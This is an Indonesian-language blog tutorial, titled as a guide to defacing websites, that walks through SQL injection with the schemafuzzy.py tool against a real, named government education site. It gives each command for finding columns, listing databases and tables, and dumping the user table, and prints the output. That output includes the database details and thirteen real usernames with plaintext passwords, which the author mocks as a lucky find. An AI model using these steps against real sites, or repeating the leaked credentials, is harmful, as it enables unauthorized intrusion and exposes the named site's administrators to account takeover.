Sabtu, 17 Desember 2011

deface dengan Schemafuzzy.py

02.34 shinichi kudo No comments


1.Python (http://www.python.org/ftp/python/2.5/python-2.5.msi)
2.Schemafuzz (http://rup.ee/schemafuzzy.py)
3.CMD

buka cmd masuk ke folder tempat schemafuzz.py berada...
ketikkan -> schemafuzz.py -u "url target" --perintah (list perintah ada di bawah)
1. masukkan target
saya contohkan target adalah ->
http://www.ditplb.or.id/profile.php?id=1

2.Masukkan perintah untuk mencari colom name
contoh: schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1" --findcol
Maka keluar:

[+] URL: [url=http://www.ditplb.or.id/profile.php?id=1--]http://www.ditplb.or.id/profile.php?id=1--[/url]
[+]
Evasion Used: "+" "--"

[+] 20:36:29

[-] Proxy Not Given

[+] Attempting To find the number of columns...

[+] Testing: 0,1,2,
[+] Column Length is: 3

[+] Found null column at column #: 2

[+] SQLi URL: [url=http://www.ditplb.or.id/profile.php?id=]http://www.ditplb.or.id/profile.php?id=[/url] ... CT+0,1,2--

[+] darkc0de
URL: [url=http://www.ditplb.or.id/profile.php?id=]http://www.ditplb.or.id/profile.php?id=[/url] ... 1,darkc0de
[-] Done!











ternyata ada 2 kolom.
Berarti kita gunain http://www.ditplb.or.id/profile.php?id= ... 1,darkc0de untuk inject

3.Cari database dg command --dbs
contoh : schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de " --dbs
Maka keluar:


Code:

[+] URL: [url=http://www.ditplb.or.id/profile.php?id=]http://www.ditplb.or.id/profile.php?id=[/url] ... darkc0de--

[+] Evasion Used: "+" "--"

[+] 2032

[-] Proxy Not Given

[+] Gathering MySQL Server Configuration...

Database: t15618_plb
User: t15618_plbid@localhost

Version: 5.0.32-Debian_7etch8

[+] Showing all databases current user has access too!

[+] Number of Databases: 1

[0] t15618_plb


[-] 2039

[-] Total URL Requests 3

[-] Done



disitu udah keliatan nama DBnya??? t15618_plb

4.Cari nama table dalam database
contoh: schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de " --schema -D namadatabase
Jadinya: schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de " --schema -D t15618_plb
Maka keluar:
Code:

[+] URL: [url=http://www.ditplb.or.id/profile.php?id=]http://www.ditplb.or.id/profile.php?id=[/url] ... darkc0de--

[+] Evasion Used: "+" "--"

[+] 20:43:10

[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...

Database: t15618_plb

User: t15618_plbid@localhost

Version: 5.0.32-Debian_7etch8
[+] Showing Tables & Columns from database "t15618_plb"
[+] Number of Tables: 11
[Database]: t15618_plb
[table: Columns]
[0]bukutamu: id,pengirim,email,pesan
[1]frm_daftarartikel: id_daf_art,id_kat,daftarartikel,pengirim
[2]frm_detailartikel: id_det_art,id_kat,id_daf_art,detailartikel,keteran gan
[3]frm_kategori: id_kat,kategori
[4]kabupaten: ID_kab,ID_prop,Kabupaten
[5]pelatihan: ID,Pelatihan
[6]profile: ID_Profile,sinopsis,Profile
[7]propinsi: ID_prop,Propinsi
[8]sd: ID_sd,ID_1,SD,Detail
[9]sekolah: ID_sek,ID_prop,ID_kab,Sekolah,Alamat,Telp,Email
[10]user: ID_user,UserID,Password,Keterangan,Admin
[-] 20:44:39
[-] Total URL Requests 43
[-] Done


Berarti web itu mempunyai 11 tabel.... n nama kolomnya juga udah ada..... tinggal pilih deh mana yang mau ditelanjangin...hhehehe (emg cewek ) :P

5.Melihat isi dari suatu tabel n kolom
contohl :schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de " --dump -D namadatabase -T namatable -C namakolom
Jadinya :schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de " --dump -D t15618_plb -T user -C ID_user,UserID,Password,Keterangan,Admin
Maka keluar:
Code:

[+] URL: [url=http://www.ditplb.or.id/profile.php?id=]http://www.ditplb.or.id/profile.php?id=[/url] ... darkc0de--

[+] Evasion Used: "+" "--"

[+] 20:53:46

[-] Proxy Not Given

[+] Gathering MySQL Server Configuration...

Database: t15618_plb

User: t15618_plbid@localhost

Version: 5.0.32-Debian_7etch8

[+] Dumping data from database "t15618_plb" Table "user"

[+] and Column(s) ['ID_user', 'UserID', 'Password', 'Keterangan', 'Admin']

[+] Number of Rows: 13


[0] 1:direktur:direkturplbirektur PLB:Admin Direktur PLB:

[1] 2:yusuf:siplb:Achmad Yusuf:Admin Achmad Yusuf:

[2] 3:abdulmukti:fatmawatimukti: P. Abdul Mukti:Admin P. Abdul Mukti:

[3] 4:harryrogkal: ProgKAL:Admin ProgKAL:

[4] 5:samino:kurikulum:Kurikulum:Admin Kurikulum:

[5] 6:mugiarsih:manajemen:Manajemen:Admin Manajemen:

[6] 7:sutopo:kesiswaan:Kesiswaan:Admin Kesiswaan:

[7] 8:winarno:sarana:Sarana:Admin Sarana:

[8] 9:sanusi:tatausaha:Tata Usaha:Admin Tata Usaha:

[9] 10:sutji:evaluasi:Evaluasi:Admin Evaluasi:

[10] 11:thamrin:informatika:Informatika:Admin Informatika:

[11] 12:adjie:kerjasama:Kerjasama:Admin Kerjasama:

[12] 13:media:media:Media:Admin Media:

[13] No data

[-] 20:54:14

[-] Total URL Requests 15

[-] Done


Anj**G... kok user id n passwordnya gak di encrypt ya...........mungkin ini rejeki kita biar gak susah2 decryptnya

Cara diatas berlaku untuk sql versi 5 , untuk versi 4 gunakan perintah --fuzz untuk menemukan nama tabel n kolom
contoh:schemafuzz.py -U "http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de " --fuzz

sekian tutor cupu ini moga bermanfaat. kalo ada yang kurang mohon di tambahin OK

credit: uteng

0 komentar:

Posting Komentar

Featured

Twitter Delicious Facebook Digg Stumbleupon Favorites More
RSS FeedSubscribe to Our RSS feed!
Follow Us on Twitter!Follow Us on Twitter!

 
Design by Free WordPress Themes | Bloggerized by Lasantha - Premium Blogger Themes | Best WordPress Web Hosting